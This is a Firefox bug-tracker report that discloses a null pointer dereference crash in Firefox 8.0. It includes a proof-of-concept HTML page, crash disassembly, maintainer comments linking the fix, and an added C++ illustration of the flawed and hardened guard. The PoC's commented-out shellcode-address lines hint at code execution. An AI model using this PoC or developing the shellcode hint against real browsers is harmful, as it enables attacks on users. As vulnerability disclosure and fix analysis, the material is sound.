Closed
Bug 703560
Opened 13 years ago
Closed 13 years ago
Firefox 8.0 Null Pointer Dereference PoC
Categories
(Firefox :: General, defect, P4)
RESOLVED
DUPLICATE
of bug 691785
People
(Reporter: tawaha-2007, Unassigned)
Details
Crash Data
Attachments
(1 file)
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Steps to reproduce:
Open this html file:
<html>
<body>
<object id="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));
</script>
</body>
</html>
Actual results:
./mozilla-release/content/base/src/nsObjectLoadingContent.cpp
NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
nsISupports *aContext)
{
if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
return NS_BINDING_ABORTED;
}
AutoNotifier notifier(this, PR_TRUE);
if (!IsSuccessfulRequest(aRequest)) { // go
//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
{
nsresult status;
nsresult rv = aRequest->GetStatus(&status); // Code execution is here.
// ---------------------------------------------------------------------------------
DUMP:
014E7A28 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
014E7A2B 8B07 MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
014E7A2D 8D4D FC LEA ECX,DWORD PTR SS:[EBP-4]
014E7A30 51 PUSH ECX
014E7A31 57 PUSH EDI
014E7A32 FF50 14 CALL DWORD PTR DS:[EAX+14]
EAX 0012BFC0
ECX 00080000
EDX 00080000
EBX 03A199E8
ESP 0012BF44
EBP 0012BF54
ESI 03A199C0
EDI 00000000
EIP 014E7A2B xul.014E7A2B
Severity: normal → blocker
Crash Signature: AdapterDeviceID: 2a12
AdapterVendorID: 8086
Add-ons: foxyproxy@eric.h.jung:3.3,{bb6bc1bb-f824-4702-90cd-35e2fb24f25d}:1.5.1,mozilla_cc@internetdownloadmanager.com:7.3.9 {972ce4c6-7e08-4474-a285-3208198ce6fd}:8.0
AvailableVirtualMemory: 1951932416
Buil…
Priority: -- → P4
Comment 1•13 years ago
Seems likely caused by a null aRequest not being checked properly.
Appears in Beta: http://mxr.mozilla.org/mozilla-beta/source/content/base/src/nsObjectLoadingContent.cpp#504
Fixed in Aurora?: http://mxr.mozilla.org/mozilla-aurora/source/content/base/src/nsObjectLoadingContent.cpp#511
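The failure mode comment 1 points at is the identity check in the quoted OnStartRequest: when no load is in flight, mChannel is null, so a null aRequest compares equal, the guard does not fire, and IsSuccessfulRequest dereferences the null pointer (the EDI = 00000000 read in the dump). The following is an added illustration, not Mozilla's code and not the Aurora patch referenced in the bug: the nsresult values, the nsIRequest stand-in and the ObjectLoadingContent struct are constructed here only to show the unchecked guard beside a variant that rejects a null request before comparing it to the channel.

```cpp
#include <cstdint>
#include <cstdio>

// Constructed stand-ins for the Gecko types named in the report; these are not
// Mozilla's definitions, and the nsresult codes are constants assumed here.
typedef uint32_t nsresult;
static const nsresult NS_OK = 0;
static const nsresult NS_BINDING_ABORTED = 0x804B0002;  // value assumed here
static const nsresult NS_BINDING_FAILED = 0x804B0001;   // value assumed here

// Minimal request object: only the status that GetStatus() reports.
struct nsIRequest {
  nsresult mStatus;
  nsresult GetStatus(nsresult* aStatus) const {
    *aStatus = mStatus;
    return NS_OK;
  }
};

// Same shape as the helper quoted in the report: it dereferences aRequest
// unconditionally and therefore relies on every caller filtering out null.
static bool IsSuccessfulRequest(nsIRequest* aRequest) {
  nsresult status;
  nsresult rv = aRequest->GetStatus(&status);  // null dereference if aRequest is null
  return rv == NS_OK && status == NS_OK;
}

struct ObjectLoadingContent {
  nsIRequest* mChannel;  // null until a load starts: the state the PoC relies on

  ObjectLoadingContent() : mChannel(nullptr) {}

  // Guard as quoted in the report: identity check only. With mChannel == null
  // and aRequest == null the comparison is equal, the early return is skipped,
  // and IsSuccessfulRequest dereferences null. Kept for comparison; never
  // called with null below.
  nsresult OnStartRequestUnchecked(nsIRequest* aRequest) {
    if (aRequest != mChannel) {
      return NS_BINDING_ABORTED;
    }
    if (!IsSuccessfulRequest(aRequest)) {
      return NS_BINDING_FAILED;
    }
    return NS_OK;
  }

  // Hardened guard (illustration only): a null request is rejected before
  // the identity comparison, so the null == null case cannot reach the
  // dereference regardless of whether a load is in flight.
  nsresult OnStartRequestChecked(nsIRequest* aRequest) {
    if (!aRequest || aRequest != mChannel) {
      return NS_BINDING_ABORTED;
    }
    if (!IsSuccessfulRequest(aRequest)) {
      return NS_BINDING_FAILED;
    }
    return NS_OK;
  }
};

// True when the hardened guard rejects a null request with no load in flight.
static bool NullRequestIsRejected() {
  ObjectLoadingContent content;  // mChannel == null, as in the report
  return content.OnStartRequestChecked(nullptr) == NS_BINDING_ABORTED;
}

// Result for the legitimate path: the in-flight channel itself is accepted
// and its status decides the outcome.
static nsresult OwnChannelResult(nsresult channelStatus) {
  nsIRequest req = { channelStatus };
  ObjectLoadingContent content;
  content.mChannel = &req;
  return content.OnStartRequestChecked(&req);
}

// True when a request that is not the in-flight channel is rejected.
static bool ForeignRequestIsRejected() {
  nsIRequest mine = { NS_OK };
  nsIRequest other = { NS_OK };
  ObjectLoadingContent content;
  content.mChannel = &mine;
  return content.OnStartRequestChecked(&other) == NS_BINDING_ABORTED;
}

int main() {
  printf("null request rejected: %d\n", NullRequestIsRejected());
  printf("own channel accepted: %d\n", OwnChannelResult(NS_OK) == NS_OK);
  printf("failed channel reported: %d\n",
         OwnChannelResult(NS_BINDING_FAILED) == NS_BINDING_FAILED);
  printf("foreign request rejected: %d\n", ForeignRequestIsRejected());
  return 0;
}
```

The point of the side-by-side is that the original guard is correct as a channel identity check but silently doubles as the only null check; any state in which mChannel is legitimately null turns a scriptable null argument into a read at address zero, which is exactly what the EDI = 00000000 access violation in the dump shows.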
Comment 2•13 years ago
Assuming the above case:
https://hg.mozilla.org/releases/mozilla-aurora/rev/7fdae8a1acdb
Fixing bug 691785. r=khuey
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE